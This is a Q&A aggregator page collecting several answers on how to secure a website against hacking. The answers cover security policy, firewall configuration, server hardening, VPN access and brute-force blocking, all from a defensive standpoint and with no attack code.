How do you prevent your site from getting hacked?

If it is not 100% preventable, how can you tighten security to reduce that ease aside from site mirroring and regular password changes?
Answer:

First start with the understanding that there is no such thing as 100% secure. The moment you introduce "usability" into a system you also introduce risk. Understanding this and, more importantly, communicating this to the "higher ups" is critical. Organizational infosec is about mitigating that risk to an acceptable level. The place to start doing that is with policy and procedure surrounding your infosec program (SANS institute has some great resources - link included below). The thing about good P&P is that not only can it provide clear direction and oversight, it can also help save on implementation costs. Here are just a few of the benefits with starting from clear and communicated P&P: Appropriate layered mitigation for the information classification levels Correct configuration and management of security devices for the environment Appropriate, consistent (and legal!) monitoring levels Clear oversight and separation of duties (who's watching the watcher?) The trick is deciding on the balance between usability and security, fixing that point of balance (as best as you are able), and then using your P&P and periodic assessment to make sure that balance stays in place. Some of the moving parts you need to consider: Network infrastructure: You may be locked down, but if you are in a colocation facility, how are you segregated from others? Look at a network map - are there points of entry you were unaware of? Hardware security: Not just the servers that your site is located on, but also the network infrastructure devices. I can't tell you how many times we have found a server locked down, but the Cisco router is many updates behind (if updates have been performed at all). Even security monitoring devices can be an attack vector if they are improperly configured or not updated. OS security: Patch management (obviously), but also server hardening appropriate for the OS, and placement on the network. Services hardening: Part of server hardening is turning off unneeded services, but then you also need to harden the configuration of services that you leave on. Firewall configuration: Firewalls are important, layered firewalls are better (network, DMZ and host based). A poorly configured firewall can become an attack vector. Make sure to consider ingress (inbound) AND egress (outbound) rules. Especially on your DMZ. Consider also remote management: Is it necessary, is it possible to restrict remote management to internal networks, or at least specific network IPs or blocks? Web application assessment: All of the steps above don't amount to much if your web application can be used and turned against the system or network itself. Some common means of doing this are through SQL injection (through poor input validation on the part of the developers) and cross-site scripting. Monitoring and assessment Domain security: Who is the registrant, admin, etc. Evaluate how the domain is managed. What are the procedures and policies surrounding the management of the domain? Incident response: This is a big one. Who can respond to an incident? Who can instantiate an incident? When is an incident resolved? Policy and procedure is a big one here. I call it my "bad date" rule. I used to tell my daughter growing up that she needed to have a plan already decided on if a date went bad BEFORE it did so. This way she wasn't making key decisions while under crisis mode. It's the same with incident response. Periodic review of policy and procedure: Business needs change, systems are added and removed from an environment, employees come and go, applications are updated, etc. You should consider a scheduled review of your policy and procedure to factor in these changes. Potentially useful links: Definitiions of Vulnerability, Threat and Risk: http://www.digitalthreat.net/2009/06/threat-vs-vulnerability-vs-risk/ Some starter information and Policy and Procedure: http://www.sans.org/security-resources/policies/ Some discussion on information classification: http://17799-news.the-hamster.com/issue09-news1.htm Examples and discussion of SQL injection and cross-site scripting: http://www.itproportal.com/2011/01/24/hacker-selling-access-government-military-and-education-sites/ http://msdn.microsoft.com/en-us/library/ms161953.aspx http://en.wikipedia.org/wiki/SQL_injection http://en.wikipedia.org/wiki/Cross_site_scripting

Was this solution helpful to you?

Other answers

Reality; there are 2 types of System Administrators. Those who have been hacked and those who know they have been hacked. This answer assumes that you are physically hosting the server. Use a 4 ip number network to connect to your ISP. That means only 2 devices can be on the network. Your firewall and your ISP's router. Create a DMZ. All of your servers are behind at least one firewall. Use a firewall that supports both white listing and black listing. White list services that are used by a small number of people from fixed locations. For example if you are going to use ftp for your clients, block ftp except for the ip numbers of your client. Black list huge swathes of the Internet. If your clients are US only black list the rest of the world. Pin hole the firewall. Only open ports actually needed by a specific server. Lets say you have a DNS server, an Email server and a web server. At 10.10.10.3, 10.10.10.4 and 10.10.10.5. The firewall would only need to allow traffic on port 53 going to ip 10.10.10.3; ports 25, 110 and 143 to 10.10.10.4 and port 80 going to 10.10.10.5 4. Actually build a firewall on the servers themselves. Even if it looks repetitive its not. 5. Use an OS known to be secure. OpenBSD, Solaris, Debian (netinstall) perhaps Windows 2008r2. (yes, did build a secure server) 6. Only install the services you need and remove the applications only needed to make the install. Debian, is very good for removing these types of applications. 7. Do not open port 22 SSH on any ip number facing the Internet. NEVER EVER!!! 8. Use programs that will block brute force attacks. Such as Fail2ban http://www.fail2ban.org/wiki/index.php/Main_Page

Alan Cohen

First of all, you should make as sure as possible, that the things which are hosted on your server are secure - you may order a professional security audit, or something like that. THIS is definitely the easiest part of auditing your server, someone who is at least medium skilled in web developing will find at least 1 bug in nearly every php(or whatever) code out there. Second you may want to monitor everything whats behind your website, like your server, this is also not too hard to lock it up. Get some security modules like grsecurity. (google on it, there are lots more like this) Try to harden every connection you are using to access your server (FTP,SSH,RDP etc.) consider using certificates, if you want to max this out you could use a L2TP/IPSec VPN using certificate, and configure any service on your server to just listen to vpn ip, this would reduce the risk of beeing hacked extremely, because, if performed perfectly, only the VPN service is visible. (to max out the max, use portknocking, but thats just security by obscurity) If you have done all this, there there are only 5 possibilities left of beeing hacked: Security hole in your operating system itself (which can't be fixed by yourself normally) VPN Service is unsecure Your Certificate has been stolen You, your it professional, or auditor failed Someone manages to get physical access by the way, dont even think about securing a big website to the max, noone in the next 10 years will be able to ultimately secure something which is as big as quora or so on (because, if you dont make any mistake in coding it, the one who developed the framework made a mistake, or someone who coded a little part of session handler... i think you know what i'm trying to say) greetings

Mario Dengg

Outsource your hosting to a reliable provider who cares about security and has a good track record. There are literally hundreds of things that you need to check to ensure that you're safe. This can include verifying your server security settings and file permissions, passwords are changed (for all users) on a periodic basis, users are re-validated for continued business need, network settings are checked on a periodic basis, firewall and router rules are verified on a periodic basis, your application code is tested for vulnerabilities on a periodic basis, your systems are patched continuously without a single gap of exposure, your anti-virus is maintained and checked daily for attacks, your intrusion detection systems are working and are being monitored. This is just a short snippet of items... I could go on and on... You really don't want to do this every month. The only other option is to hire a security professional to do it in-house.

Andrew Lemke

Related Q & A:

How can I prevent memory warning in IOS?Best solution by cultofmac.com
How do I tell if my IP is hacked?Best solution by answers.yahoo.com
How can you prevent your ears from popping on an airplane?Best solution by Yahoo! Answers
How do you prevent your name from appearing in an email with Outlook Express (ver. 6?Best solution by Yahoo! Answers
How can I prevent varicose veins?Best solution by Yahoo! Answers

Just Added Q & A:

How many active mobile subscribers are there in China?Best solution by Quora
How to find the right vacation?Best solution by bookit.com
How To Make Your Own Primer?Best solution by thekrazycouponlady.com
How do you get the domain & range?Best solution by ChaCha
How do you open pop up blockers?Best solution by Yahoo! Answers

For every problem there is a solution! Proved by Solucija.

Got an issue and looking for advice?
Ask Solucija to search every corner of the Web for help.
Get workable solutions and helpful tips in a moment.

Just ask Solucija about an issue you face and immediately get a list of ready solutions, answers and tips from other Internet users. We always provide the most suitable and complete answer to your question at the top, along with a few good alternatives below.